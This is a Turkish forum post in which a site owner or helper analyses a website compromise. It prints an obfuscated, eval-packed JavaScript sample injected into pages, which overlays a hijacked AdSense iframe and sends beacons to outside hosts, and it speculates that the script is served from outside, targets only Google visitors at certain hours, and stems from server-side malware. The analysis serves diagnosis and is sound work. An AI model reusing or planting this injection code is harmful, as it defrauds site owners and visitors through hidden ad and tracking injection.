İlgili kodu <script></script> etiketleri arasına yerleştirip .html olarak kaydettikten sonra çıkacak ekran bakın bakalım tanıdık gelecek mi?
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 P=t;3 S=t;6 1U(2,w,h,l,r,x,s,4){d(!S&&j["12"]){S=17;d(j["12"]()==\'1Z\')n}d(2=="")2+=B 1X().25();3 b=8.E("A");b.2="V"+2;3 1L=(l>=0)?"11:"+l+"9;":"10:"+r+"9;";b.7.I="N:"+w+";D:"+(h+4.Q)+"9;1K:1Y;1V:1J;1N:c;"+1L+"z-1Q:1P;Y:c;k:c;u:c";8.o.y(b);3 O=8.E("A");O.7.I="N:"+w+"9;D:"+h+"9;Y:c;k:c;u:c";b.y(O);d(!j.1W){j.2g("2i",6(){1O(2,h+4.Q)})}d(4.1l){3 J=8.E("A");J.7.I="N:"+w+"9;D:"+4.Q+"9;k:c;u:c;W-p:#Z";J.1E=4.1D;b.y(J);3 1F=(4.15>=0)?"11:"+4.15+"9;":"10:"+4.1m+"9;";3 1H=(4.14>=0)?"K:"+4.14+"9;":"1N:"+4.1p+"9;";3 g=8.E("a");g.7.I="1K:1J;k:c;u:c;D:"+4.1k+"9;"+1F+";"+1H+"W-p:#Z;p:#1j;z-1Q:1P;v-2f:1G;2e: 28;M-2j:2c;M-2d:2b;M-1r:2a;";g.1E="<A 7=\'k:29;k-11:1n;k-10:1n;u:c;v-2k:2l\'>X <1B 7=\'M-1r:2h;\'>2m</1B></A>";g.22="#";g.24=6(){1I(2);d(s)n s(m);n t};g.21=6(){m.7.1s="#23";m.7.p="#1A"};g.20=6(){m.7.1s="#Z";m.7.p="#1j"};b.y(g)}3 e=8.E("2w");e.2="1f"+2;e.Y=0;e.2Q=0;e.2R="1o";e.7.N=w+"9";e.7.D=h+"9";O.y(e);3 L=e.1g.8;L.13("<!2n 18><18><1z><7 1e=\'v/2J\'>o { u:c; W-p:#1A; }</7></1z><o 2S=\'1o\'>");L.13(x);L.13("</o></18>");1T(6(){8.U("1f"+2).1g.8.2X()},2W);d(!P&&j["T"]){j["T"]();P=17}}3 1S={1l:17,15:-1,1m:0,14:-1,1p:0,1k:16,Q:16,1D:\'&2u;\',2v:6(){3 19={};1R(3 1a 2I m){19[1a]=m[1a]}n 19}};6 1b(2,w,h,l,r,x,s,4){d(!4)4=1S;d(!8.o){1T(6(){1b(2,w,h,l,r,x,s,4)},2p);n}1U(2,w,h,l,r,x,s,4)}6 1O(2,K){3 b=8.U("V"+2);d(b)b.7.K=8.o.2y+8.o.2F-K+"9"}6 1I(2){3 b=8.U("V"+2);d(b)b.7.2C="1G"}6 2z(H){P=t;j["T"]=H}6 1y(H){S=t;j["12"]=H}6 1M(2){(B G()).q="C://1v.1w.1u.1C/"+2+".1q"}(6(){1y(6(){3 1d=8.2B("2A");1R(3 i=0;i<1d.2D;i++){d(1d[i].q.2G("/1i.")>-1){1M(\'2E\');n\'\'}}});3 f=\'<F\'+\'R 1e="v/1h">\';f+=\'2x = "2r-2q-2o";\';f+=\'2t = "2H";\';f+=\'2V = 1x;\';f+=\'2U = 1t;\';f+=\'</F\'+\'R>\';f+=\'<F\'+\'R 1e="v/1h" q="C://1i.2T.1c/2M/2L.2K"></F\'+\'R>\';1b(\'\',1x,1t,2N,0,f,6(){(B G()).q="C://a.27-5.1c/2O.2P";n t})})();(B G()).q="C://1v.1w.1u.1C/26.1q";(B G()).q="C://a.27-5.1c/2s";',62,184,'||id|var|options||function|style|document|px||se_bg|0px|if|se_body|_adc|se_button|||window|padding||this|return|body|color|src||onbclick|false|margin|text||adbody|appendChild||div|new|http|height|createElement|scr|Image|func|cssText|se_nobut|top|se_content|font|width|se_cdiv|SE_ISLOADER|XNHeight|ipt|SE_ISLOADER_START|SE_LOADEND_RUN|getElementById|SE_ADLINK_LAY_|background||border|ccc|right|left|SE_LOADEND_START|writeln|XTop|XLeft||true|html|_element|item|SE_SHOWAD_RUN|com|scripts|type|SE_ADFRAME_|contentWindow|javascript|pagead2|000|XHeight|XButton|XRight|5px|no|XBottom|asp|weight|backgroundColor|280|51|img|users|336|SE_SET_LOADSTART|head|fff|span|la|XNCode|innerHTML|slr|none|stb|SE_HIDDENAD_RUN|absolute|position|lr|SE_LA|bottom|SE_AUTOPOSTION|2147483647|index|for|SE_DEFAULT_OPTIONS|setTimeout|SE_ADLINK_FUNC|_position|XMLHttpRequest|Date|fixed|exit|onmouseout|onmouseover|href|ff3300|onclick|getTime|1458087||pointer|1px|bold|Arial|12px|family|cursor|decoration|attachEvent|normal|onscroll|size|align|center|Close|DOCTYPE|0552135711235860|1000|pub|ca|run|google_ad_slot|nbsp|Copy|iframe|google_ad_client|scrollTop|SE_SET_LOADFUNC|script|getElementsByTagName|display|length|15940000|clientHeight|indexOf|3295881345|in|css|js|show_ads|pagead|300|click|ashx|frameBorder|scrolling|scroll|googlesyndication|google_ad_height|google_ad_width|2000|close'.split('|'),0,{}))Başından beri diyorum bu kodlar dışarıdan çekiliyor, çekilen domain adresini de daha önceki mesajlarımda belirttim.
Yalnız hangi kod üzerinden çağırılıyor onu çözemedim, ama şunu söyleyebilirim ki kodu yazan herif bildiğin usta.
Şöyle ki yazdığı kod sadece Google ziyaretçilerine görünüyor ve yakalanma ihtimalini en aza indirmek için sadece belli saat aralıklarında çalışıyor.
Acaba diyorum sunucu taraflı bir zararlı mı, IIS üzerine hiçbir bilgim yok fakat daha önce Apache sunucu üzerinde buna benzer bir saldırıya rastlamıştım.
Bahsettiğim saldırıda içerisinde hiçbir dosya olmayan boş index sayfasında bile iframe kodu çağırılıyordu, yani nasıl bir saldırıysa artık Apache'yi komple etkiliyordu ve ne tesadüftür ki bu saldırı da Çin kaynaklıydı.